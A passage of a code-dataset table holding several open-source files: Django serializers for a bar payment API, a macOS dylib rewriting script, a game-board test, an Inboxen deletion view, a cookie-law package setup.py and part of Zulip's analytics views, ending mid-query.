| repo_name (string, len 5–92) | path (string, len 4–221) | copies (19 classes) | size (string, len 4–6) | content (string, len 766–896k) | license (15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 32–997) | alpha_frac (float64, 0.25–0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5–13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| KSG-IT/ksg-nett | api/serializers.py | 1 | 4959 |
from django.conf import settings
from rest_framework import serializers
from rest_framework_simplejwt.serializers import TokenObtainSlidingSerializer
from api.exceptions import InsufficientFundsException, NoSociSessionError
from economy.models import SociProduct, ProductOrder, SociSession, SociBankAccount
class CustomTokenObtainSlidingSerializer(TokenObtainSlidingSerializer):
"""
Overridden so we can obtain a token for a user based only on the card uuid.
"""
username_field = "card_uuid"
def __init__(self, *args, **kwargs):
"""
Overridden from `TokenObtainSerializer` since this adds a required
field `password` to the serializer that we don't need.
"""
super().__init__(*args, **kwargs)
del self.fields['password']
def validate(self, attrs):
"""
Overridden from `TokenObtainSlidingSerializer` since
this expects a username and password to be supplied.
"""
data = {}
token = self.get_token(self.context['request'].user)
data['token'] = str(token)
return data
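# A minimal usage sketch for the serializer above (hypothetical view code,
# not part of this module):
# serializer = CustomTokenObtainSlidingSerializer(
#     data={'card_uuid': card_uuid},
#     context={'request': request},
# )
# serializer.is_valid(raise_exception=True)
# token = serializer.validated_data['token']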
# ===============================
# ECONOMY
# ===============================
from sensors.consts import MEASUREMENT_TYPE_CHOICES
from sensors.models import SensorMeasurement
class SociProductSerializer(serializers.Serializer):
sku_number = serializers.CharField(read_only=True, label="Product SKU number")
name = serializers.CharField(read_only=True, label="Product name")
price = serializers.IntegerField(read_only=True, label="Product price in NOK")
description = serializers.CharField(read_only=True, allow_blank=True, allow_null=True, label="Product description",
help_text="Returns `null` if no description exists")
icon = serializers.CharField(read_only=True, label="Product icon descriptor")
class CheckBalanceSerializer(serializers.Serializer):
id = serializers.IntegerField(read_only=True, label="This soci bank account ID")
user = serializers.CharField(source='user.get_full_name', read_only=True, label="User's full name")
balance = serializers.IntegerField(read_only=True, label="Balance in NOK",
help_text="Should not be displayed publicly")
class ChargeSociBankAccountDeserializer(serializers.Serializer):
sku = serializers.CharField(label="Product SKU number to charge for")
order_size = serializers.IntegerField(default=1, required=False, label="Order size for this product",
help_text="Defaults to 1 if not supplied")
@staticmethod
def validate_sku(value):
if not SociProduct.objects.filter(sku_number=value).exists():
raise serializers.ValidationError('SKU number is invalid.')
return value
@staticmethod
def validate_order_size(value):
if value <= 0:
raise serializers.ValidationError('Order size must be positive.')
return value
def validate(self, attrs):
if attrs['sku'] != settings.DIRECT_CHARGE_SKU:
attrs['amount'] = SociProduct.objects.get(sku_number=attrs['sku']).price
else:
attrs['amount'] = 1
self.context['total'] += attrs['amount'] * attrs['order_size']
if self.context['total'] > self.context['soci_bank_account'].balance:
raise InsufficientFundsException()
if SociSession.get_active_session() is None:
raise NoSociSessionError()
return attrs
def create(self, validated_data):
product_order = ProductOrder.objects.create(
product=SociProduct.objects.get(sku_number=validated_data.pop('sku')), **validated_data
)
return product_order
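# Hedged usage sketch for the deserializer above; `account` and the SKU are
# illustrative, and any extra save() kwargs depend on the ProductOrder model:
# deserializer = ChargeSociBankAccountDeserializer(
#     data={'sku': 'BEER', 'order_size': 2},
#     context={'total': 0, 'soci_bank_account': account},
# )
# deserializer.is_valid(raise_exception=True)
# order = deserializer.save(source=account)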
class PurchaseSerializer(serializers.Serializer):
amount_charged = serializers.IntegerField(read_only=True, source='total_amount',
label="Amount that was charged from user's Soci account")
amount_remaining = serializers.IntegerField(read_only=True, source='source.balance',
label="Remaining balance in user's Soci account",
help_text="Should not be displayed publicly")
products_purchased = serializers.ListField(read_only=True, child=serializers.CharField(),
help_text="The products that were purchased")
class SensorMeasurementSerializer(serializers.Serializer):
type = serializers.ChoiceField(
choices=MEASUREMENT_TYPE_CHOICES,
label="The type of measurement.",
)
value = serializers.FloatField(
label="The value of the measurement",
)
created_at = serializers.DateTimeField(
label="The time of the measurement",
)
def create(self, validated_data):
return SensorMeasurement.objects.create(**validated_data)
| gpl-3.0 | 6,613,007,558,135,177,000 | 36.545455 | 119 | 0.650525 | false | 4.460846 | false | false | false |
| fordcars/SDL3D | tools/Frameworkify/frameworkify.py | 1 | 3860 |
#!/usr/bin/env python -S
# -*- coding: utf-8 -*-
r"""
frameworkify
~~~~~~~~~~~~
A small command line tool that can rewrite the paths to dynamic
loaded libraries in .dylib files so that they reference other
paths. By default it will rewrite the path so that it points to
the bundle's Frameworks folder. This can be paired with a CMake
post build action to make proper bundles without having to
recompile a bunch of dylibs to reference the framework.
Usage::
$ frameworkify.py MyApplication.app/Contents/MacOS/MyApplication \
> /path/to/mylib.dylib
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
from optparse import OptionParser
def find_bundle(executable):
executable = os.path.abspath(executable)
if not os.path.isfile(executable):
raise RuntimeError('Executable does not exist')
folder, exe_name = os.path.split(executable)
content_path, folder = os.path.split(folder)
if folder != 'MacOS':
raise RuntimeError('Executable not located inside a bundle')
return content_path
def find_baked_dylibs(executable):
from subprocess import Popen, PIPE
c = Popen(['otool', '-L', executable], stdout=PIPE)
lines = c.communicate()[0].splitlines()
return [x.strip().split(' (')[0] for x in lines[1:]]
def find_matching_dylib(dylibs, basename):
lbasename = basename.lower()
for dylib in dylibs:
if os.path.basename(dylib).lower() == lbasename:
return dylib
def rewrite_path(executable, old, new):
from subprocess import Popen
Popen(['install_name_tool', '-change', old, new, executable]).wait()
def copy_to_framework(bundle_path, filename, target_name):
from shutil import copy2
framework_path = os.path.join(bundle_path, 'Frameworks')
if not os.path.isdir(framework_path):
os.mkdir(framework_path)
copy2(filename, os.path.join(framework_path, target_name))
def perform_rewrite_operation(rewrites, executable, bundle_path, copy=True):
for old_path, new_path, dylib_path in rewrites:
rewrite_path(executable, old_path, new_path)
if copy:
copy_to_framework(bundle_path, dylib_path,
os.path.basename(new_path))
def frameworkify(executable, dylibs, nocopy, path):
bundle = find_bundle(executable)
baked_dylibs = find_baked_dylibs(executable)
def _make_new_path(dylib_name):
if path:
return os.path.join(path, dylib_name)
return '@executable_path/../Frameworks/' + dylib_name
rewrites = []
for dylib in dylibs:
dylib_name = os.path.basename(dylib)
dylib_path_match = find_matching_dylib(baked_dylibs, dylib_name)
if dylib_path_match is None:
raise Exception('dylib "%s" is not referenced by "%s"' % (
dylib_name,
executable
))
rewrites.append((dylib_path_match, _make_new_path(dylib_name), dylib))
perform_rewrite_operation(rewrites, executable, bundle, not nocopy)
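# Hedged illustration of one entry in the `rewrites` list built above
# (the paths are made up):
# ('/usr/local/lib/mylib.dylib',                   # install name baked into the binary
#  '@executable_path/../Frameworks/mylib.dylib',   # rewritten bundle-relative path
#  '/path/to/mylib.dylib')                         # file copied into Contents/Frameworks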
def main():
parser = OptionParser()
parser.add_option('-p', '--path', dest='path', metavar='PATH',
help='alternative path to dylib')
parser.add_option('-C', '--nocopy', dest='nocopy', action='store_true',
help='don\'t copy dylib to framework folder')
opts, args = parser.parse_args()
if len(args) < 2:
parser.error('Not enough arguments: executable and a list of dylibs')
if opts.path and not opts.nocopy:
parser.error('Path combined with copy operation is not supported')
try:
frameworkify(args[0], args[1:], opts.nocopy, opts.path)
except Exception, e:
parser.error(str(e))
sys.exit(1)
if __name__ == '__main__':
main()
| gpl-3.0 | -5,696,709,541,733,503,000 | 31.720339 | 78 | 0.644041 | false | 3.780607 | false | false | false |
| acbilson/forbidden-island | tests/test_print.py | 1 | 1905 |
import sys
sys.path.append('../src')
from tiles import *
from tile import *
class Test(object):
def __init__(self):
self.board = ""
def gen_board(self, tiles):
segments = []
rows = [[0,1],
[2,3,4,5],
[6,7,8,9,10,11],
[12,13,14,15,16,17],
[18,19,20,21],
[22,23]]
spaces = [' ',
' ',
'',
'',
' ',
' ']
names = [t.name for t in tiles]
players = [t.player for t in tiles]
statuses = [t.status for t in tiles]
allSegs = []
for i in range(0, len(rows)):
nameSegments = self._gen_segments(rows[i], spaces[i], ('/', '\\'), names)
playerSegments = self._gen_segments(rows[i], spaces[i], ('|', '|'), players)
statusSegments = self._gen_segments(rows[i], spaces[i], ('\\', '/'), statuses, newLine=True)
allSegs.append(''.join(nameSegments))
allSegs.append(''.join(playerSegments))
allSegs.append(''.join(statusSegments))
return ''.join(allSegs)
def _gen_segments(self, row, space, dividers, tileSegments, newLine=None):
TILE_SPACE = ' '
segments = []
segments.append(space)
last = row[len(row)-1]
rowSegments = tileSegments[row[0]:last+1]
for i,rs in enumerate(rowSegments):
segments.append(dividers[0] + rs.value + dividers[1])
if len(rowSegments) != i:
segments.append(TILE_SPACE)
segments.append(space + '\n')
if newLine != None:
segments.append('\n')
return segments
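# Note: the `len(rowSegments) != i` check above is always true, since i only
# runs from 0 to len(rowSegments) - 1; every row therefore ends with a
# trailing tile space before the closing padding.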
if __name__ == '__main__':
tiles = Tiles()
t = Test()
board = t.gen_board(tiles.tiles)
print(board)
| gpl-3.0 | 8,462,663,968,441,839,000 | 23.74026 | 104 | 0.467192 | false | 3.764822 | false | false | false |
| Inboxen/website | views/inbox/delete.py | 1 | 2017 |
##
# Copyright (C) 2013 Jessica Tallon & Matt Molyneaux
#
# This file is part of Inboxen.
#
# Inboxen is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Inboxen is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Inboxen. If not, see <http://www.gnu.org/licenses/>.
##
from django.views import generic
from django.utils.translation import ugettext as _
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse_lazy
from django.contrib import messages
from inboxen import models
from queue.delete.tasks import delete_inbox
from website import forms
from website.views import base
__all__ = ["InboxDeletionView"]
class InboxDeletionView(base.CommonContextMixin, base.LoginRequiredMixin, generic.DeleteView):
model = models.Inbox
success_url = reverse_lazy('user-home')
headline = _("Delete Inbox")
template_name = "inbox/delete.html"
def get_object(self, *args, **kwargs):
return self.request.user.inbox_set.get(
inbox=self.kwargs["inbox"],
domain__domain=self.kwargs["domain"]
)
def delete(self, request, *args, **kwargs):
self.object = self.get_object()
success_url = self.get_success_url()
self.object.flags.deleted = True
self.object.save()
delete_inbox.delay(self.object.id, request.user.id)
messages.success(request, _("{0}@{1} has been deleted.".format(self.object.inbox, self.object.domain.domain)))
return HttpResponseRedirect(success_url)
| agpl-3.0 | -7,981,159,622,210,445,000 | 36.351852 | 118 | 0.706495 | false | 3.80566 | false | false | false |
| juan-cb/django-cookie-law | setup.py | 1 | 1609 |
#!/usr/bin/env python
import os
from setuptools import setup, find_packages
from itertools import chain
from glob import glob
import cookielaw
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: JavaScript',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Session',
]
package_data_globs = (
'cookielaw/templates/cookielaw/*.html',
'cookielaw/static/cookielaw/*/*',
'cookielaw/locale/*/*/*'
)
package_data = []
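# Strip the leading 'cookielaw/' component so each entry is relative to the
# package directory, as setuptools' package_data expects.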
for f in chain(*map(glob, package_data_globs)):
package_data.append(f.split('/', 1)[1])
setup(
author='Piotr Kilczuk',
author_email='piotr@tymaszweb.pl',
name='django-cookie-law',
version='.'.join(str(v) for v in cookielaw.VERSION),
description='Helps your Django project comply with EU cookie law regulations',
long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
url='https://github.com/TyMaszWeb/django-cookie-law',
license='BSD License',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
'Django>=1.2',
'django-classy-tags>=0.3.0',
],
tests_require=[
'selenium==3.0.1',
],
packages=find_packages(),
package_data={'cookielaw': package_data},
include_package_data=False,
zip_safe=False,
test_suite='runtests.main',
)
| bsd-2-clause | -8,123,308,249,982,098,000 | 27.22807 | 88 | 0.649472 | false | 3.408898 | false | false | false |
| sonali0901/zulip | analytics/views.py | 1 | 37020 |
from __future__ import absolute_import, division
from django.conf import settings
from django.core import urlresolvers
from django.db import connection
from django.db.models import Sum
from django.db.models.query import QuerySet
from django.http import HttpResponseNotFound, HttpRequest, HttpResponse
from django.template import RequestContext, loader
from django.utils import timezone
from django.utils.translation import ugettext as _
from jinja2 import Markup as mark_safe
from analytics.lib.counts import CountStat, process_count_stat, COUNT_STATS
from analytics.lib.time_utils import time_range
from analytics.models import BaseCount, InstallationCount, RealmCount, \
UserCount, StreamCount, last_successful_fill
from zerver.decorator import has_request_variables, REQ, zulip_internal, \
zulip_login_required, to_non_negative_int, to_utc_datetime
from zerver.lib.request import JsonableError
from zerver.lib.response import json_success
from zerver.lib.timestamp import ceiling_to_hour, ceiling_to_day, timestamp_to_datetime
from zerver.models import Realm, UserProfile, UserActivity, \
UserActivityInterval, Client
from zproject.jinja2 import render_to_response
from collections import defaultdict
from datetime import datetime, timedelta
import itertools
import json
import logging
import pytz
import re
import time
from six.moves import filter, map, range, zip
from typing import Any, Dict, List, Tuple, Optional, Callable, Type, \
Union, Text, Set
@zulip_login_required
def stats(request):
# type: (HttpRequest) -> HttpResponse
return render_to_response('analytics/stats.html',
context=dict(realm_name = request.user.realm.name))
@has_request_variables
def get_chart_data(request, user_profile, chart_name=REQ(),
min_length=REQ(converter=to_non_negative_int, default=None),
start=REQ(converter=to_utc_datetime, default=None),
end=REQ(converter=to_utc_datetime, default=None)):
# type: (HttpRequest, UserProfile, Text, Optional[int], Optional[datetime], Optional[datetime]) -> HttpResponse
if chart_name == 'number_of_humans':
stat = COUNT_STATS['active_users:is_bot:day']
tables = [RealmCount]
subgroups = ['false', 'true']
labels = ['human', 'bot']
labels_sort_function = None
include_empty_subgroups = [True]
elif chart_name == 'messages_sent_over_time':
stat = COUNT_STATS['messages_sent:is_bot:hour']
tables = [RealmCount, UserCount]
subgroups = ['false', 'true']
labels = ['human', 'bot']
labels_sort_function = None
include_empty_subgroups = [True, False]
elif chart_name == 'messages_sent_by_message_type':
stat = COUNT_STATS['messages_sent:message_type:day']
tables = [RealmCount, UserCount]
subgroups = ['public_stream', 'private_stream', 'private_message']
labels = ['Public Streams', 'Private Streams', 'PMs & Group PMs']
labels_sort_function = lambda data: sort_by_totals(data['realm'])
include_empty_subgroups = [True, True]
elif chart_name == 'messages_sent_by_client':
stat = COUNT_STATS['messages_sent:client:day']
tables = [RealmCount, UserCount]
subgroups = [str(x) for x in Client.objects.values_list('id', flat=True).order_by('id')]
# these are further re-written by client_label_map
labels = list(Client.objects.values_list('name', flat=True).order_by('id'))
labels_sort_function = sort_client_labels
include_empty_subgroups = [False, False]
else:
raise JsonableError(_("Unknown chart name: %s") % (chart_name,))
# Most likely someone using our API endpoint. The /stats page does not
# pass a start or end in its requests.
if start is not None and end is not None and start > end:
raise JsonableError(_("Start time is later than end time. Start: %(start)s, End: %(end)s") %
{'start': start, 'end': end})
realm = user_profile.realm
if start is None:
start = realm.date_created
if end is None:
end = last_successful_fill(stat.property)
if end is None or start > end:
logging.warning("User from realm %s attempted to access /stats, but the computed "
"start time: %s (creation time of realm) is later than the computed "
"end time: %s (last successful analytics update). Is the "
"analytics cron job running?" % (realm.string_id, start, end))
raise JsonableError(_("No analytics data available. Please contact your server administrator."))
end_times = time_range(start, end, stat.frequency, min_length)
data = {'end_times': end_times, 'frequency': stat.frequency, 'interval': stat.interval}
for table, include_empty_subgroups_ in zip(tables, include_empty_subgroups):
if table == RealmCount:
data['realm'] = get_time_series_by_subgroup(
stat, RealmCount, realm.id, end_times, subgroups, labels, include_empty_subgroups_)
if table == UserCount:
data['user'] = get_time_series_by_subgroup(
stat, UserCount, user_profile.id, end_times, subgroups, labels, include_empty_subgroups_)
if labels_sort_function is not None:
data['display_order'] = labels_sort_function(data)
else:
data['display_order'] = None
return json_success(data=data)
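# Hedged sketch of the payload for chart_name='number_of_humans' (field
# values are illustrative; json_success wraps the dict in Zulip's standard
# success envelope):
# {'end_times': [...], 'frequency': ..., 'interval': ...,
#  'realm': {'human': [12, 13, ...], 'bot': [2, 2, ...]},
#  'display_order': None}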
def sort_by_totals(value_arrays):
# type: (Dict[str, List[int]]) -> List[str]
totals = []
for label, values in value_arrays.items():
totals.append((label, sum(values)))
totals.sort(key=lambda label_total: label_total[1], reverse=True)
return [label for label, total in totals]
# For any given user, we want to show a fixed set of clients in the chart,
# regardless of the time aggregation or whether we're looking at realm or
# user data. This fixed set ideally includes the clients most important in
# understanding the realm's traffic and the user's traffic. This function
# tries to rank the clients so that taking the first N elements of the
# sorted list has a reasonable chance of doing so.
def sort_client_labels(data):
# type: (Dict[str, Dict[str, List[int]]]) -> List[str]
realm_order = sort_by_totals(data['realm'])
user_order = sort_by_totals(data['user'])
label_sort_values = {} # type: Dict[str, float]
for i, label in enumerate(realm_order):
label_sort_values[label] = i
for i, label in enumerate(user_order):
label_sort_values[label] = min(i-.1, label_sort_values.get(label, i))
return [label for label, sort_value in sorted(label_sort_values.items(),
key=lambda x: x[1])]
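# Worked example: with realm_order = ['website', 'ZulipMobile'] and
# user_order = ['ZulipMobile'], the realm pass sets
# {'website': 0, 'ZulipMobile': 1}; the user pass then lowers 'ZulipMobile'
# to min(0 - .1, 1) = -0.1, so the user's own top client sorts first:
# ['ZulipMobile', 'website'].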
def table_filtered_to_id(table, key_id):
# type: (Type[BaseCount], int) -> QuerySet
if table == RealmCount:
return RealmCount.objects.filter(realm_id=key_id)
elif table == UserCount:
return UserCount.objects.filter(user_id=key_id)
elif table == StreamCount:
return StreamCount.objects.filter(stream_id=key_id)
elif table == InstallationCount:
return InstallationCount.objects.all()
else:
raise ValueError("Unknown table: %s" % (table,))
def client_label_map(name):
# type: (str) -> str
if name == "website":
return "Website"
if name.startswith("desktop app"):
return "Old desktop app"
if name == "ZulipAndroid":
return "Android app"
if name == "ZulipiOS":
return "Old iOS app"
if name == "ZulipMobile":
return "New iOS app"
if name in ["ZulipPython", "API: Python"]:
return "Python API"
if name.startswith("Zulip") and name.endswith("Webhook"):
return name[len("Zulip"):-len("Webhook")] + " webhook"
# Clients in dev environment autogenerated data start with _ so
# that it's easy to manually drop without affecting other data.
if settings.DEVELOPMENT and name.startswith("_"):
return name[1:]
return name
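# e.g. client_label_map('ZulipGitHubWebhook') == 'GitHub webhook'.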
def rewrite_client_arrays(value_arrays):
# type: (Dict[str, List[int]]) -> Dict[str, List[int]]
mapped_arrays = {} # type: Dict[str, List[int]]
for label, array in value_arrays.items():
mapped_label = client_label_map(label)
if mapped_label in mapped_arrays:
for i in range(0, len(array)):
mapped_arrays[mapped_label][i] += value_arrays[label][i]
else:
mapped_arrays[mapped_label] = [value_arrays[label][i] for i in range(0, len(array))]
return mapped_arrays
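# e.g. {'ZulipPython': [1, 2], 'API: Python': [3, 4]} both map to
# 'Python API' and collapse to {'Python API': [4, 6]}.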
def get_time_series_by_subgroup(stat, table, key_id, end_times, subgroups, labels, include_empty_subgroups):
# type: (CountStat, Type[BaseCount], Optional[int], List[datetime], List[str], List[str], bool) -> Dict[str, List[int]]
if len(subgroups) != len(labels):
raise ValueError("subgroups and labels have lengths %s and %s, which are different." %
(len(subgroups), len(labels)))
queryset = table_filtered_to_id(table, key_id).filter(property=stat.property) \
.values_list('subgroup', 'end_time', 'value')
value_dicts = defaultdict(lambda: defaultdict(int)) # type: Dict[Optional[str], Dict[datetime, int]]
for subgroup, end_time, value in queryset:
value_dicts[subgroup][end_time] = value
value_arrays = {}
for subgroup, label in zip(subgroups, labels):
if (subgroup in value_dicts) or include_empty_subgroups:
value_arrays[label] = [value_dicts[subgroup][end_time] for end_time in end_times]
if stat == COUNT_STATS['messages_sent:client:day']:
# HACK: We rewrite these arrays to collapse the Client objects
# with similar names into a single sum, and generally give
# them better names
return rewrite_client_arrays(value_arrays)
return value_arrays
eastern_tz = pytz.timezone('US/Eastern')
def make_table(title, cols, rows, has_row_class=False):
# type: (str, List[str], List[Any], bool) -> str
if not has_row_class:
def fix_row(row):
# type: (Any) -> Dict[str, Any]
return dict(cells=row, row_class=None)
rows = list(map(fix_row, rows))
data = dict(title=title, cols=cols, rows=rows)
content = loader.render_to_string(
'analytics/ad_hoc_query.html',
dict(data=data)
)
return content
def dictfetchall(cursor):
# type: (connection.cursor) -> List[Dict[str, Any]]
"Returns all rows from a cursor as a dict"
desc = cursor.description
return [
dict(list(zip([col[0] for col in desc], row)))
for row in cursor.fetchall()
]
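# e.g. a cursor over "select 1 as id, 'x' as name" yields
# [{'id': 1, 'name': 'x'}].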
def get_realm_day_counts():
# type: () -> Dict[str, Dict[str, str]]
query = '''
select
r.string_id,
(now()::date - pub_date::date) age,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
join zerver_client c on c.id = m.sending_client_id
where
(not up.is_bot)
and
pub_date > now()::date - interval '8 day'
and
c.name not in ('zephyr_mirror', 'ZulipMonitoring')
group by
r.string_id,
age
order by
r.string_id,
age
'''
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
counts = defaultdict(dict) # type: Dict[str, Dict[int, int]]
for row in rows:
counts[row['string_id']][row['age']] = row['cnt']
result = {}
for string_id in counts:
raw_cnts = [counts[string_id].get(age, 0) for age in range(8)]
min_cnt = min(raw_cnts)
max_cnt = max(raw_cnts)
def format_count(cnt):
# type: (int) -> str
if cnt == min_cnt:
good_bad = 'bad'
elif cnt == max_cnt:
good_bad = 'good'
else:
good_bad = 'neutral'
return '<td class="number %s">%s</td>' % (good_bad, cnt)
cnts = ''.join(map(format_count, raw_cnts))
result[string_id] = dict(cnts=cnts)
return result
def realm_summary_table(realm_minutes):
# type: (Dict[str, float]) -> str
query = '''
SELECT
realm.string_id,
coalesce(user_counts.active_user_count, 0) active_user_count,
coalesce(at_risk_counts.at_risk_count, 0) at_risk_count,
(
SELECT
count(*)
FROM zerver_userprofile up
WHERE up.realm_id = realm.id
AND is_active
AND not is_bot
) user_profile_count,
(
SELECT
count(*)
FROM zerver_userprofile up
WHERE up.realm_id = realm.id
AND is_active
AND is_bot
) bot_count
FROM zerver_realm realm
LEFT OUTER JOIN
(
SELECT
up.realm_id realm_id,
count(distinct(ua.user_profile_id)) active_user_count
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
WHERE
query in (
'/json/send_message',
'send_message_backend',
'/api/v1/send_message',
'/json/update_pointer',
'/json/users/me/pointer'
)
AND
last_visit > now() - interval '1 day'
AND
not is_bot
GROUP BY realm_id
) user_counts
ON user_counts.realm_id = realm.id
LEFT OUTER JOIN
(
SELECT
realm_id,
count(*) at_risk_count
FROM (
SELECT
realm.id as realm_id,
up.email
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
JOIN zerver_realm realm
ON realm.id = up.realm_id
WHERE up.is_active
AND (not up.is_bot)
AND
ua.query in (
'/json/send_message',
'send_message_backend',
'/api/v1/send_message',
'/json/update_pointer',
'/json/users/me/pointer'
)
GROUP by realm.id, up.email
HAVING max(last_visit) between
now() - interval '7 day' and
now() - interval '1 day'
) as at_risk_users
GROUP BY realm_id
) at_risk_counts
ON at_risk_counts.realm_id = realm.id
WHERE EXISTS (
SELECT *
FROM zerver_useractivity ua
JOIN zerver_userprofile up
ON up.id = ua.user_profile_id
WHERE
query in (
'/json/send_message',
'/api/v1/send_message',
'send_message_backend',
'/json/update_pointer',
'/json/users/me/pointer'
)
AND
up.realm_id = realm.id
AND
last_visit > now() - interval '2 week'
)
ORDER BY active_user_count DESC, string_id ASC
'''
cursor = connection.cursor()
cursor.execute(query)
rows = dictfetchall(cursor)
cursor.close()
# get messages sent per day
counts = get_realm_day_counts()
for row in rows:
try:
row['history'] = counts[row['string_id']]['cnts']
except Exception:
row['history'] = ''
# augment data with realm_minutes
total_hours = 0.0
for row in rows:
string_id = row['string_id']
minutes = realm_minutes.get(string_id, 0.0)
hours = minutes / 60.0
total_hours += hours
row['hours'] = str(int(hours))
try:
row['hours_per_user'] = '%.1f' % (hours / row['active_user_count'],)
except Exception:
pass
# formatting
for row in rows:
row['string_id'] = realm_activity_link(row['string_id'])
# Count active sites
def meets_goal(row):
# type: (Dict[str, int]) -> bool
return row['active_user_count'] >= 5
num_active_sites = len(list(filter(meets_goal, rows)))
# create totals
total_active_user_count = 0
total_user_profile_count = 0
total_bot_count = 0
total_at_risk_count = 0
for row in rows:
total_active_user_count += int(row['active_user_count'])
total_user_profile_count += int(row['user_profile_count'])
total_bot_count += int(row['bot_count'])
total_at_risk_count += int(row['at_risk_count'])
rows.append(dict(
string_id='Total',
active_user_count=total_active_user_count,
user_profile_count=total_user_profile_count,
bot_count=total_bot_count,
hours=int(total_hours),
at_risk_count=total_at_risk_count,
))
content = loader.render_to_string(
'analytics/realm_summary_table.html',
dict(rows=rows, num_active_sites=num_active_sites)
)
return content
def user_activity_intervals():
# type: () -> Tuple[mark_safe, Dict[str, float]]
day_end = timestamp_to_datetime(time.time())
day_start = day_end - timedelta(hours=24)
output = "Per-user online duration for the last 24 hours:\n"
total_duration = timedelta(0)
all_intervals = UserActivityInterval.objects.filter(
end__gte=day_start,
start__lte=day_end
).select_related(
'user_profile',
'user_profile__realm'
).only(
'start',
'end',
'user_profile__email',
'user_profile__realm__string_id'
).order_by(
'user_profile__realm__string_id',
'user_profile__email'
)
by_string_id = lambda row: row.user_profile.realm.string_id
by_email = lambda row: row.user_profile.email
realm_minutes = {}
for string_id, realm_intervals in itertools.groupby(all_intervals, by_string_id):
realm_duration = timedelta(0)
output += '<hr>%s\n' % (string_id,)
for email, intervals in itertools.groupby(realm_intervals, by_email):
duration = timedelta(0)
for interval in intervals:
start = max(day_start, interval.start)
end = min(day_end, interval.end)
duration += end - start
total_duration += duration
realm_duration += duration
output += " %-*s%s\n" % (37, email, duration)
realm_minutes[string_id] = realm_duration.total_seconds() / 60
output += "\nTotal Duration: %s\n" % (total_duration,)
output += "\nTotal Duration in minutes: %s\n" % (total_duration.total_seconds() / 60.,)
output += "Total Duration amortized to a month: %s" % (total_duration.total_seconds() * 30. / 60.,)
content = mark_safe('<pre>' + output + '</pre>')
return content, realm_minutes
def sent_messages_report(realm):
# type: (str) -> str
title = 'Recently sent messages for ' + realm
cols = [
'Date',
'Humans',
'Bots'
]
query = '''
select
series.day::date,
humans.cnt,
bots.cnt
from (
select generate_series(
(now()::date - interval '2 week'),
now()::date,
interval '1 day'
) as day
) as series
left join (
select
pub_date::date pub_date,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
(not up.is_bot)
and
pub_date > now() - interval '2 week'
group by
pub_date::date
order by
pub_date::date
) humans on
series.day = humans.pub_date
left join (
select
pub_date::date pub_date,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
up.is_bot
and
pub_date > now() - interval '2 week'
group by
pub_date::date
order by
pub_date::date
) bots on
series.day = bots.pub_date
'''
cursor = connection.cursor()
cursor.execute(query, [realm, realm])
rows = cursor.fetchall()
cursor.close()
return make_table(title, cols, rows)
def ad_hoc_queries():
# type: () -> List[Dict[str, str]]
def get_page(query, cols, title):
# type: (str, List[str], str) -> Dict[str, str]
cursor = connection.cursor()
cursor.execute(query)
rows = cursor.fetchall()
rows = list(map(list, rows))
cursor.close()
def fix_rows(i, fixup_func):
# type: (int, Union[Callable[[Realm], mark_safe], Callable[[datetime], str]]) -> None
for row in rows:
row[i] = fixup_func(row[i])
for i, col in enumerate(cols):
if col == 'Realm':
fix_rows(i, realm_activity_link)
elif col in ['Last time', 'Last visit']:
fix_rows(i, format_date_for_activity_reports)
content = make_table(title, cols, rows)
return dict(
content=content,
title=title
)
pages = []
###
for mobile_type in ['Android', 'ZulipiOS']:
title = '%s usage' % (mobile_type,)
query = '''
select
realm.string_id,
up.id user_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like '%s'
group by string_id, up.id, client.name
having max(last_visit) > now() - interval '2 week'
order by string_id, up.id, client.name
''' % (mobile_type,)
cols = [
'Realm',
'User id',
'Name',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Desktop users'
query = '''
select
realm.string_id,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like 'desktop%%'
group by string_id, client.name
having max(last_visit) > now() - interval '2 week'
order by string_id, client.name
'''
cols = [
'Realm',
'Client',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Integrations by realm'
query = '''
select
realm.string_id,
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
